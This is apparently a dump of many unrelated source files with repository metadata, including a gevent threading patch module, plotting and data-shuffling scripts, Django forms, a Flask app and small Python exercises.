# twice as fast (1.16 vs 0.68usec on PyPy, 29.3 vs 17.7usec on
# CPython 2.7), and has the important effect of avoiding
# allocation and then immediate deletion of _Thread__block, a
# lock. This is especially important on PyPy where locks go
# through the cpyext API and Cython, which is known to be slow and
# potentially buggy (e.g.,
# https://bitbucket.org/pypy/pypy/issues/2149/memory-leak-for-python-subclass-of-cpyext#comment-22347393)
# These objects are constructed quite frequently in some cases, so
# the optimization matters: for example, in gunicorn, which uses
# pywsgi.WSGIServer, every request is handled in a new greenlet,
# and every request uses a logging.Logger to write the access log,
# and every call to a log method captures the current thread (by
# default).
#
# (Obviously we have to duplicate the effects of the constructor,
# at least for external state purposes, which is potentially
# slightly fragile.)
# For the same reason, instances of this class will cleanup their own entry
# in ``threading._active``
# This class also solves a problem forking process with subprocess: after forking,
# Thread.__stop is called, which throws an exception when __block doesn't
# exist.
# Capture the static things as class vars to save on memory/
# construction time.
# In Py2, they're all private; in Py3, they become protected
_Thread__stopped = _is_stopped = _stopped = False
_Thread__initialized = _initialized = True
_Thread__daemonic = _daemonic = True
_Thread__args = _args = ()
_Thread__kwargs = _kwargs = None
_Thread__target = _target = None
_Thread_ident = _ident = None
_Thread__started = _started = __threading__.Event()
_Thread__started.set()
_tstate_lock = None
def __init__(self): # pylint:disable=super-init-not-called
#_DummyThread_.__init__(self)
# It'd be nice to use a pattern like "greenlet-%d", but maybe somebody out
# there is checking thread names...
self._name = self._Thread__name = __threading__._newname("DummyThread-%d")
# All dummy threads in the same native thread share the same ident
# (that of the native thread)
self._set_ident()
g = getcurrent()
gid = _get_ident(g)
__threading__._active[gid] = self
rawlink = getattr(g, 'rawlink', None)
if rawlink is not None:
# raw greenlet.greenlet greenlets don't
# have rawlink...
rawlink(_cleanup)
else:
# ... so for them we use weakrefs.
# See https://github.com/gevent/gevent/issues/918
global _weakref
if _weakref is None:
_weakref = __import__('weakref')
ref = _weakref.ref(g, _make_cleanup_id(gid))
self.__raw_ref = ref
def _Thread__stop(self):
pass
_stop = _Thread__stop # py3
def _wait_for_tstate_lock(self, *args, **kwargs):
# pylint:disable=arguments-differ
pass
if hasattr(__threading__, 'main_thread'): # py 3.4+
def main_native_thread():
return __threading__.main_thread() # pylint:disable=no-member
else:
def main_native_thread():
main_threads = [v for v in __threading__._active.values()
if isinstance(v, __threading__._MainThread)]
assert len(main_threads) == 1, "Too many main threads"
return main_threads[0]
import sys
if sys.version_info[:2] >= (3, 4):
# XXX: Issue 18808 breaks us on Python 3.4.
# Thread objects now expect a callback from the interpreter itself
# (threadmodule.c:release_sentinel). Because this never happens
# when a greenlet exits, join() and friends will block forever.
# The solution below involves capturing the greenlet when it is
# started and deferring the known broken methods to it.
class Thread(__threading__.Thread):
_greenlet = None
def is_alive(self):
return bool(self._greenlet)
isAlive = is_alive
def _set_tstate_lock(self):
self._greenlet = getcurrent()
def run(self):
try:
super(Thread, self).run()
finally:
# avoid ref cycles, but keep in __dict__ so we can
# distinguish the started/never-started case
self._greenlet = None
self._stop() # mark as finished
def join(self, timeout=None):
if '_greenlet' not in self.__dict__:
raise RuntimeError("Cannot join an inactive thread")
if self._greenlet is None:
return
self._greenlet.join(timeout=timeout)
def _wait_for_tstate_lock(self, *args, **kwargs):
# pylint:disable=arguments-differ
raise NotImplementedError()
__implements__.append('Thread')
class Timer(Thread, __threading__.Timer): # pylint:disable=abstract-method,inherit-non-class
pass
__implements__.append('Timer')
# The main thread is patched up with more care
# in _gevent_will_monkey_patch
if sys.version_info[:2] >= (3, 3):
__implements__.remove('_get_ident')
__implements__.append('get_ident')
get_ident = _get_ident
__implements__.remove('_sleep')
# Python 3 changed the implementation of threading.RLock
# Previously it was a factory function around threading._RLock
# which in turn used _allocate_lock. Now, it wants to use
# threading._CRLock, which is imported from _thread.RLock and as such
# is implemented in C. So it bypasses our _allocate_lock function.
# Fortunately they left the Python fallback in place
assert hasattr(__threading__, '_CRLock'), "Unsupported Python version"
_CRLock = None
__implements__.append('_CRLock')
def _gevent_will_monkey_patch(native_module, items, warn): # pylint:disable=unused-argument
# Make sure the MainThread can be found by our current greenlet ID,
# otherwise we get a new DummyThread, which cannot be joined.
# Fixes tests in test_threading_2 under PyPy.
main_thread = main_native_thread()
if __threading__.current_thread() != main_thread:
warn("Monkey-patching outside the main native thread. Some APIs "
"will not be available. Expect a KeyError to be printed at shutdown.")
return
if _get_ident() not in __threading__._active:
main_id = main_thread.ident
del __threading__._active[main_id]
main_thread._ident = main_thread._Thread__ident = _get_ident()
__threading__._active[_get_ident()] = main_thread
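# Usage sketch: this module is normally activated by monkey-patching rather
# than imported directly, e.g.
#
#   from gevent import monkey; monkey.patch_all()
#   import threading  # now backed by the greenlet-aware classes above
#   t = threading.Thread(target=print, args=("runs in a greenlet",))
#   t.start(); t.join()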
| [
"[email protected]"
] | |
a8116934e376d20bbab74c6b1f04d617a5ffe9ec | 1484f2311bc250a2ffd3841ec225855ad1e49ede | /web/trpo_plot.py | e9e3a8343ec3e49b21f05983053c327efc1e0bab | [
"Apache-2.0"
] | permissive | seba-1511/dtrpo.tf | 68527e2e043d1afc5545a961a5542447d66c658e | af6c1376eff0c82e591374b785a3d460407d3663 | refs/heads/master | 2021-03-27T13:00:22.816806 | 2017-09-14T20:38:24 | 2017-09-14T20:38:24 | 68,479,754 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,337 | py | #!/usr/bin/env python
import numpy as np
from seb.plot import Plot3D, Plot, Container, Animation
def grad_descent(x, y, dfnx, dfny, alpha=0.2, length=50):
trace = [(x, y)]
for _ in range(length):
x = x - alpha * dfnx(x)
y = y - alpha * dfny(y)
trace.append((x, y))
return np.array(trace), (x, y)
if __name__ == '__main__':
point_considered = -36
x_init = -1.9
y_init = -1
x = np.linspace(-7, 7, 50)
# 3D example
fn = lambda x, y: -np.sin(x / 2.0) + y**2
dfnx = lambda x: -0.5 * np.cos(x/2.0)
dfny = lambda y: 2*y
fig3d = Plot3D()
fig3d.surface(x, np.cos(x + 0.5), fn)
# fig3d.projection(x, np.cos(x + 0.5), fn)
fig3d.set_camera(45, 66)
fig3d.set_axis('x axis', 'y axis', 'z axis')
trace, (x_final, y_final) = grad_descent(x_init, y_init, dfnx, dfny)
fig3d.scatter(x=[trace[point_considered, 0], ],
y=[trace[point_considered, 1], ],
z=fn,
s=350.0, label='Trust Region')
fig3d.plot(x=trace[:, 0], y=trace[:, 1], z=fn, label='Trajectory')
fig3d.save('trpo3d.png')
# 1D Example
fig1d = Plot()
trace = trace[:-15]
point_considered = point_considered + 15
z = 10 * np.array([fn(a[0], a[1]) for a in trace])
iterations = np.arange(len(trace))
fig1d.circle(x=iterations[point_considered], y=z[point_considered], radius=1.0)
fig1d.plot(x=iterations, y=z, label='True Loss')
fig1d.scatter(x=[iterations[point_considered], ], y=[z[point_considered], ], label='Current params', s=10.0)
fig1d.annotate('Trust Region', (18, 17), (15, 5), rad=0.3)
fig1d.set_axis('Parameters', 'Cost')
# Hypothetical curves
x_trunc = iterations[point_considered:]
z_trunc = z[point_considered:]
z2 = [z_trunc[0] + np.sin((a - z_trunc[0])) for a in z_trunc]
fig1d.plot(x=x_trunc, y=z2)
z2 = [z_trunc[0] + np.sin((a - z_trunc[0])) for a in z_trunc]
fig1d.plot(x=x_trunc, y=z2)
z3 = [z_trunc[0] + 2*(a - z_trunc[0]) for a in z_trunc]
fig1d.plot(x=x_trunc, y=z3)
fig1d.save('conv.png')
cont = Container(1, 2)
cont.set_plot(0, 0, fig3d)
cont.set_plot(0, 1, fig1d)
cont.save('full.png')
# anim = Animation()
# fig3d.canvas.axis('off')
# anim.rotate_3d(fig3d)
# anim.save('trpo3d.gif')
| [
"[email protected]"
] | |
9a750644c7c30d305fece0758054509b41313121 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nnnewtown.py | 084a3e8d2a8510dc0d941baaf04079e5df1a367d | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 64 | py | ii = [('DaltJMA.py', 4), ('MereHHB3.py', 7), ('MereHHB2.py', 1)] | [
"[email protected]"
] | |
b91a9f014091d145beefd604b36e716ee1e6cd3b | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_160/ch47_2019_09_30_21_19_06_189136.py | 30315c6f92701799d9635e7747e2e53b795f6ba8 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | mes = ["Janeiro", 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho', 'Agosto','Setembro', 'Outubro', 'Novembro', 'Dezembro']
a = int(input("What is the month number?"))
print (mes[a-1]) | [
"[email protected]"
] | |
eb5c9dbff404af9ff312c40ae66082dcc42196ee | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/1/bT2.py | 33365dc270356a82e93b241e13483a5298b32126 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'bT2':
printFunction(data[1:])
else:
print 'ERROR'
return
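# Input sketch: each line of the file named by sys.argv[1] starts with a tag.
# A 'bT2' line whose payload sits between standalone quote tokens prints the
# words in between; any other tag prints ERROR and stops. For example:
#
#   bT2 " hello world "   ->  hello world
#   bT2 " "               ->  (empty line)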
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
0ef7edf91fbab55c4122ffaac4c6826a2d8eb89f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02582/s810007923.py | dddac5bb9b0868ce8c3f5f6ede87c46bf622dad1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | n = input()
r = 0   # current streak of consecutive 'R' (rainy) days
Tr = 0  # streak length recorded at the most recent 'R'
for i in n:
if i == "R":
r += 1
Tr = r
elif i == "S":
r = 0
print(Tr)  # the rainy streak ending at the last 'R' (the longest streak for this short input)
| [
"[email protected]"
] | |
0c4bfd10df3bbda83d7ce3efebdafd3fc2400fa6 | 4331b28f22a2efb12d462ae2a8270a9f666b0df1 | /.history/dvdstore/webapp/form_20190914173126.py | 5fb05c3529c11f9f5ddfc438f3c22c91bac43a33 | [] | no_license | ZiyaadLakay/csc312.group.project | ba772a905e0841b17478eae7e14e43d8b078a95d | 9cdd9068b5e24980c59a53595a5d513c2e738a5e | refs/heads/master | 2020-07-26T23:30:22.542450 | 2019-09-16T11:46:41 | 2019-09-16T11:46:41 | 200,703,160 | 0 | 0 | null | 2019-08-05T17:52:37 | 2019-08-05T17:52:37 | null | UTF-8 | Python | false | false | 897 | py | from django import forms
from .models import DVD, Customer
from django.contrib.auth.models import User, auth
class DocumentForm(forms.ModelForm):
class Meta:
model = DVD
fields = ('Title','year','genre','PriceDVD','InStock','Synopsis','BookingPickup' ,'NumOfTimesRented','ImageDVD')
        widgets = {'summary': forms.Textarea(attrs={'rows': 80, 'cols': 20}),}  # note: 'summary' must match a declared field name for the widget to take effect
class CustomerForm(forms.ModelForm):
class Meta:
model= Customer
#user = User.objects.create_user(username=username, password=password1, email=email, first_name=first_name, last_name=last_name)
fields = ('username','password','email','first_name','last_name','phone_number','address','identification')
class customerForm2(forms.ModelForm):
class Meta:
model= Customer
fields = ('username','password','email','first_name','last_name','phone_number','address','identification','isStaff')
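# View-side usage sketch (view and template names are placeholders, and
# django.shortcuts.render is assumed to be imported):
#
#   def upload_dvd(request):
#       form = DocumentForm(request.POST or None, request.FILES or None)
#       if request.method == 'POST' and form.is_valid():
#           form.save()
#       return render(request, 'upload.html', {'form': form})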
| [
"[email protected]"
] | |
7651a9f9d6c025bbdc709a5aa4c5b17f0f9d5060 | 6a41dd36ddd3e501b62ff253b40bf9bbbaa722c2 | /코딩예제/ex01.py | 607d15fdb242b5454c257ab598cfc8ef6f0762cb | [] | no_license | skysamer/first_python | 9ba79b194d838e0cdeab6f2e7a4207d71c73ed63 | 638622f51434eda65ef3300e3ce5db3a2a79db2a | refs/heads/master | 2023-02-03T08:21:23.370285 | 2020-12-27T13:39:20 | 2020-12-27T13:39:20 | 307,953,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | print("Hello coding python")
print("hello!"*3)
print("혼자 공부하다 모르면 동영상 강의를 참고하세요")
| [
"[email protected]"
] | |
e0af43df6c45466129cf468cb3fa6be008df41a7 | e32fbfdd7e4c8060faf97d0f046b5c957b4695f8 | /app/tests/test_diffing.py | 5de81ab73492233fb2f9d4ddf4101528f5e10996 | [
"CC-BY-3.0",
"MIT"
] | permissive | fidlej/myerrata | ffeb777cc1b8cd2151b7dc7e79f1e1dd0fabed06 | c5b5cc78303bb783eb59a6d6c628d2b27a6584ca | refs/heads/master | 2020-04-11T16:02:41.134009 | 2010-08-25T15:21:48 | 2010-08-25T15:21:48 | 32,650,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,217 | py | # coding: utf-8
from nose.tools import eq_
from src import diffing
def test_mark_changes():
tests = [
(("buy big car", "buy small car"),
"buy <del>big</del><ins>small</ins> car"),
(("buy big car", "buy small red car"),
"buy <del>big</del><ins>small red</ins> car"),
(("buy big car", "buy small car and test it"),
"buy <del>big</del><ins>small</ins> car<del></del><ins> and test it</ins>"),
(("buy big expensive car", "buy small car"),
"buy <del>big expensive</del><ins>small</ins> car"),
(("come to visit me and buy me a new algorithm", "algorithm, come to visit me and buy milk"),
"<ins>algorithm, </ins>come to visit me and buy <del>me a new algorithm</del><ins>milk</ins>"),
(("buy milk", "buy me a new algorithm"),
"buy <del>milk</del><ins>me a new algorithm</ins>"),
(("say something to me", "do you have anything to say?"),
"<ins>do you have anything to </ins>say<del> something to me</del><ins>?</ins>"),
((u"change vaše property", u"change naše property"),
u"change <del>vaše</del><ins>naše</ins> property"),
]
for args, expected in tests:
eq_(diffing.mark_changes(*args), expected)
| [
"[email protected]"
] | |
950fcc02c58cf78ac95e31320c47621e7685ecc1 | 9f674f9ba21a345bb3d573e0c77c4343427e1aca | /CorePython/11-ExceptionHandling/03-TryElse.py | 03207550771d87ab85a0332b854bd9c3cbf7b618 | [] | no_license | ravi4all/PythonWE_11-12_30 | f9c91c5ed238476933c0b92e55492259da8e4311 | c4d7a4bd3939b82056ed47d5a04624ec7565125f | refs/heads/master | 2021-09-13T22:34:31.082037 | 2018-05-05T11:13:05 | 2018-05-05T11:13:05 | 105,269,134 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | try:
file = open("file_1.txt")
data = file.read()
print(data)
    file.seek(0,1,2)  # seek() accepts at most two arguments, so this deliberately raises TypeError
except BaseException as err:
print("Error...",err)
else:
print("Inside Else")
finally:
print("File closed...")
file.close()
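# For contrast, a minimal variant where the try block raises nothing, so the
# else branch runs before finally:
try:
    total = sum([1, 2, 3])
except BaseException as err:
    print("Error...", err)
else:
    print("Inside Else, total =", total)  # reached: no exception was raised
finally:
    print("Done...")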
| [
"[email protected]"
] | |
ef59afb84dff253a108d771345e0adaaaa95a998 | 37aae70d77b0d4a0f2b073e5e032810b54f96657 | /google-cloud-sdk/lib/googlecloudsdk/api_lib/tasks/__init__.py | bf325b45fc95c19b9adb58c3266cee30e157326d | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | talentdeveloper/casino_bot | 454a493ee09482ebe5ff00f0e983d2b2d99f7d85 | 60d1781934dd018055bac1e2b7ded44216ff875c | refs/heads/master | 2022-12-20T10:24:30.767164 | 2019-06-14T11:31:52 | 2019-06-14T11:31:52 | 189,037,455 | 0 | 1 | null | 2022-12-09T04:15:46 | 2019-05-28T13:49:03 | Python | UTF-8 | Python | false | false | 1,258 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""API Library for gcloud cloudtasks."""
from googlecloudsdk.api_lib.util import apis
API_NAME = 'cloudtasks'
API_VERSION = 'v2beta2'
def GetClientInstance(no_http=False):
return apis.GetClientInstance(API_NAME, API_VERSION, no_http=no_http)
def GetMessagesModule(client=None):
client = client or GetClientInstance()
return client.MESSAGES_MODULE
class ApiAdapter(object):
def __init__(self, client=None, messages=None):
client = client or GetClientInstance()
self.messages = messages or GetMessagesModule(client)
self.queues_service = client.projects_locations_queues
self.tasks_service = client.projects_locations_queues_tasks
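# Usage sketch (the request message name follows the generated apitools naming
# pattern and is an assumption, as is the parent path):
#
#   adapter = ApiAdapter()
#   request = adapter.messages.CloudtasksProjectsLocationsQueuesListRequest(
#       parent='projects/my-project/locations/us-central1')
#   queues = adapter.queues_service.List(request)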
| [
"[email protected]"
] | |
b2d3b409484443dd593d6a9fee8c104fc0b84c0c | 60715c9ea4c66d861708531def532814eab781fd | /python-programming-workshop/test/pythondatastructures/convert/bytes_to_megabytes.py | db68a188b17cb868fd29c58bcf7d2c17c9924547 | [] | no_license | bala4rtraining/python_programming | 6ce64d035ef04486f5dc9572cb0975dd322fcb3e | 99a5e6cf38448f5a01b310d5f7fa95493139b631 | refs/heads/master | 2023-09-03T00:10:26.272124 | 2021-11-01T08:20:52 | 2021-11-01T08:20:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py |
# Python: convert bytes and kilobytes to megabytes.
def bytestomegabytes(bytes):
return (bytes / 1024) / 1024
def kilobytestomegabytes(kilobytes):
return kilobytes / 1024
# Convert 100000 bytes to megabytes.
megabytes1 = bytestomegabytes(100000)
print(100000, "bytes =", megabytes1, "megabytes")
# 1024 kilobytes to megabytes.
megabytes2 = kilobytestomegabytes(1024)
print(1024, "kilobytes =", megabytes2, "megabytes")
| [
"[email protected]"
] | |
0f08202392d68a8a2f30a4e9fa2f592bba1057cc | ff92e5cc5a96277188eb34df60d7119947b6349e | /core/gdrn_selfocc_modeling/tools/pose_aug.py | c3b8c8a23ab102882083298db0b79d116295247d | [
"Apache-2.0"
] | permissive | Pamyuu/SO-Pose | 000783e66e52e37f8fcfc246964695c6cdc3e13d | a3a61d2c97b1084a4754d6c12e45e16d85809729 | refs/heads/main | 2023-08-16T14:33:48.022277 | 2021-10-11T08:22:46 | 2021-10-11T08:22:46 | 441,398,467 | 1 | 0 | Apache-2.0 | 2021-12-24T07:29:21 | 2021-12-24T07:29:20 | null | UTF-8 | Python | false | false | 2,456 | py | import torch
import numpy as np
import math
from transforms3d.euler import euler2mat
from core.utils.pose_utils import euler2mat_torch
def aug_poses_normal(poses, std_rot=15, std_trans=[0.01, 0.01, 0.05], max_rot=45):
"""
Args:
poses (Tensor): [n,3,4]
std_rot: deg, randomly chosen from cfg.INPUT.NOISE_ROT_STD_{TRAIN|TEST}, eg. (15, 10, 5, 2.5)
std_trans: [dx, dy, dz], cfg.INPUT.NOISE_TRANS_STD_{TRAIN|TEST}
max_rot: deg, cfg.INPUT.NOISE_ROT_MAX_{TRAIN|TEST}
Returns:
poses_aug: [n,3,4]
"""
assert poses.ndim == 3, poses.shape
poses_aug = poses.clone()
bs = poses.shape[0]
device = poses.device
if isinstance(std_rot, (tuple, list)):
std_rot = np.random.choice(std_rot)
euler_noises_deg = torch.normal(mean=0, std=std_rot, size=(bs, 3)).to(device=device)
if max_rot is not None:
euler_noises_deg = euler_noises_deg.clamp(min=-max_rot, max=max_rot)
rot_noises = euler2mat_torch(euler_noises_deg * math.pi / 180.0) # (b,3,3)
trans_noises = torch.normal(
mean=torch.zeros_like(poses[:, :3, 3]), std=torch.tensor(std_trans, device=device).view(1, 3)
)
poses_aug[:, :3, :3] = rot_noises @ poses[:, :3, :3]
poses_aug[:, :3, 3] += trans_noises
return poses_aug
def aug_poses_normal_np(poses, std_rot=15, std_trans=[0.01, 0.01, 0.05], max_rot=45):
"""
Args:
poses (ndarray): [n,3,4]
std_rot: deg, randomly chosen from cfg.INPUT.NOISE_ROT_STD_{TRAIN|TEST}
std_trans: [dx, dy, dz], cfg.INPUT.NOISE_TRANS_STD_{TRAIN|TEST}
max_rot: deg, cfg.INPUT.NOISE_ROT_MAX_{TRAIN|TEST}
Returns:
poses_aug (ndarray): [n,3,4]
"""
assert poses.ndim == 3, poses.shape
poses_aug = poses.copy()
bs = poses.shape[0]
if isinstance(std_rot, (tuple, list)):
std_rot = np.random.choice(std_rot)
euler_noises_deg = np.random.normal(loc=0, scale=std_rot, size=(bs, 3))
if max_rot is not None:
euler_noises_deg = np.clip(euler_noises_deg, -max_rot, max_rot)
euler_noises_rad = euler_noises_deg * math.pi / 180.0
rot_noises = np.array([euler2mat(*xyz) for xyz in euler_noises_rad])
trans_noises = np.concatenate(
[np.random.normal(loc=0, scale=std_trans_i, size=(bs, 1)) for std_trans_i in std_trans], axis=1
)
poses_aug[:, :3, :3] = rot_noises @ poses[:, :3, :3]
poses_aug[:, :3, 3] += trans_noises
return poses_aug
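# Usage sketch for the NumPy variant: jitter two identity poses.
#
#   poses = np.tile(np.hstack([np.eye(3), np.zeros((3, 1))]), (2, 1, 1))  # [2,3,4]
#   noisy = aug_poses_normal_np(poses, std_rot=15, std_trans=[0.01, 0.01, 0.05])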
| [
"[email protected]"
] | |
dccffc2a24e794af9ca352655e7bf2a47a54601a | 5838669d86cc572348ae16b4d50023815b5b7dd8 | /utils/shuffle_train_val.py | 73a4cc8d729cb90cb62fdaafde9df9a65f7a5c71 | [] | no_license | GiantPandaCV/yolov3-point | 46dc303693138bdf2a47f2d1827be46b0cd5a958 | 11b13147556029620d920c501f2880237947f245 | refs/heads/master | 2022-04-11T11:49:09.952474 | 2022-03-14T02:11:04 | 2022-03-14T02:11:04 | 234,021,307 | 214 | 55 | null | 2020-07-13T13:30:02 | 2020-01-15T07:15:27 | Jupyter Notebook | UTF-8 | Python | false | false | 1,330 | py | import os
import shutil
import random
train_txt = "/home/dongpeijie/datasets/dimtargetSingle/2007_train.txt"
test_txt = "/home/dongpeijie/datasets/dimtargetSingle/2007_test.txt"
val_txt = "/home/dongpeijie/datasets/dimtargetSingle/test.txt"
train_out_txt = "/home/dongpeijie/datasets/dimtargetSingle/shuffle_train.txt"
test_out_txt = "/home/dongpeijie/datasets/dimtargetSingle/shuffle_test.txt"
f_train = open(train_txt, "r")
f_test = open(test_txt, "r")
f_val = open(val_txt, "r")
o_train = open(train_out_txt, "w")
o_test = open(test_out_txt, "w")
train_content = f_train.readlines()
test_content = f_test.readlines()
val_content = f_val.readlines()
all_content = [*train_content, *test_content, *val_content]
print(len(train_content), len(test_content), len(all_content))
len_all = len(all_content)
train_percent = 0.8
# train:test = 8:2
train_sample_num = int(len_all * train_percent)
test_sample_num = len_all - train_sample_num
print("Train Sample:%d\nTest Sample:%d\n" % (train_sample_num, test_sample_num))
# print(random.sample(all_content, 10))
sampled_train = random.sample(all_content, train_sample_num)
for i in all_content:
if i in sampled_train:
o_train.write(i)
else:
o_test.write(i)
print("done")
f_test.close()
f_train.close()
f_val.close()
o_test.close()
o_train.close() | [
"[email protected]"
] | |
41c7ffd1ee44140d2d6909cdf3db380238a9019b | c83b9951cc5f54f2381ccdae7cef2b4b283dc663 | /practice/models.py | eaf2d14b42d2a654eb4ee39e559eb5fe38c10249 | [] | no_license | Tedhoon/s3 | faed91af68fa0b4aca7cd30c0e006f59dc337863 | 8f04492864b0228cae6a5c9d5c51e4505bcee3f5 | refs/heads/master | 2020-12-05T18:49:51.871855 | 2020-01-07T01:18:16 | 2020-01-07T01:18:16 | 232,215,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | from django.db import models
class Image(models.Model):
img = models.ImageField(upload_to='usr') | [
"[email protected]"
] | |
01da5a0e86cd8ce29cbc5a202aa44f0231c8e8af | dc955cb940976e360853a03c8a18c173be21e406 | /web_flask/3-python_route.py | 080068cf4596ab06d921d340f2c4365846556cbe | [] | no_license | SantiagoHerreG/AirBnB_clone_v2 | 888c04617d1f1e6ca01d080a57ae1932596a3a9a | 2669d2455e657c1096d8f32c1d083fdb3d22665b | refs/heads/master | 2020-11-25T05:24:36.767546 | 2020-01-23T04:20:59 | 2020-01-23T04:20:59 | 228,519,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | #!/usr/bin/python3
"""Uses the Flask micro framework to make an app server listen at 0.0.0.0:5000
"""
from flask import Flask
app = Flask(__name__)
@app.route('/', strict_slashes=False)
def home():
"""Function for handling the route /
"""
return "Hello HBNB!"
@app.route('/hbnb', strict_slashes=False)
def hbnb():
"""Handles /hbnb route
"""
return "HBNB"
@app.route('/c/<text>', strict_slashes=False)
def show_text(text=None):
"""Handles a request to route /c/<text>
"""
    return "C {}".format(text.replace("_", " "))
@app.route('/python/', strict_slashes=False)
@app.route('/python/<text>', strict_slashes=False)
def show_python(text="is_cool"):
"""Handles a request to route /python/(<text>)
"""
return "Python {}".format(text.replace("_", " "))
if __name__ == '__main__':
app.run(host='0.0.0.0', port='5000')
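# Hedged check (not in the original file): the routes can be exercised without
# running the server by using Flask's test client:
#
#   client = app.test_client()
#   assert client.get("/").data == b"Hello HBNB!"
#   assert client.get("/c/is_fun").data == b"C is fun"
#   assert client.get("/python/").data == b"Python is cool"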
| [
"[email protected]"
] | |
f14bf2284a5ac68035d5cc581bed6b3963daf922 | 3c7dcf8c7af1536af8d6ff3b7ec4389e9523823a | /ssl_sale_ext/__manifest__.py | 9d0dd99da365af6fa2c0a914e27283a768065fe9 | [] | no_license | tate11/module | cb70e8e45ecb9912a597ea9310c29baf9074fa90 | b5148fad3f3a23df749d3d3d7278c2ce22e067d8 | refs/heads/master | 2020-03-18T21:11:18.403431 | 2017-06-14T07:48:48 | 2017-06-14T07:48:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | # -*- coding: utf-8 -*-
{
    'name': 'SAL: SuperSilicone Sale Extension',
'version': '1.0',
'author': 'Kornelius K Macario (Falinwa Indonesia)',
'description': '''
    Module to extend the reporting files in Quotations.
''',
'depends': [
'ssl_base_ext',
],
'data': [
'report/ssl_sale_ext_report.xml',
'report/wishlist_report.xml',
'views/sale_view.xml',
'views/partner_view.xml',
'views/crm_lead_view.xml',
'views/wishlist_number.xml',
],
'css': [],
'js': [],
'installable': True,
'active': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
94090cd146bdbb675c2a0236d33670dd56158a11 | 006341ca12525aa0979d6101600e78c4bd9532ab | /CMS/Zope-3.2.1/Dependencies/twisted-Zope-3.2.1/twisted/lore/__init__.py | 142e9e5fcdd90fda4df2e11b44a9594c01d4c49d | [
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"ZPL-2.1",
"Python-2.0",
"ICU",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause",
"ZPL-2.0"
] | permissive | germanfriday/code-examples-sandbox | d0f29e20a3eed1f8430d06441ac2d33bac5e4253 | 4c538584703754c956ca66392fdcecf0a0ca2314 | refs/heads/main | 2023-05-30T22:21:57.918503 | 2021-06-15T15:06:47 | 2021-06-15T15:06:47 | 377,200,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
#
'''
The Twisted Documentation Generation System
Maintainer: U{Andrew Bennetts<mailto:[email protected]>}
'''
# TODO
# Abstract
# Bibliography
# Index
# Allow non-web image formats (EPS, specifically)
# Allow pickle output and input to minimize parses
# Numbered headers
# Navigational aides
__version__ = 'SVN-Trunk'
| [
"[email protected]"
] | |
c99df2302f718da619b9117303bad092b189a97e | 170864b6ec66be48138f231fe8ac3381481b8c9d | /python/BOJ_15652.py | 20c6e031ade32221e23ea0305ac743f403e37932 | [] | no_license | hyesungoh/AA_Algorithm | 5da3d8312d035d324dfaa31eef73f01a238231f3 | d68f52eaa29cfc4656a8b5623359166779ded06e | refs/heads/master | 2023-06-09T14:49:01.402456 | 2021-06-28T10:10:09 | 2021-06-28T10:10:09 | 272,701,231 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | n, m = map(int, input().split())
l = list(range(1, n+1))
ans = []
def bt(depth, index):
    # When m numbers have been chosen, print the current combination.
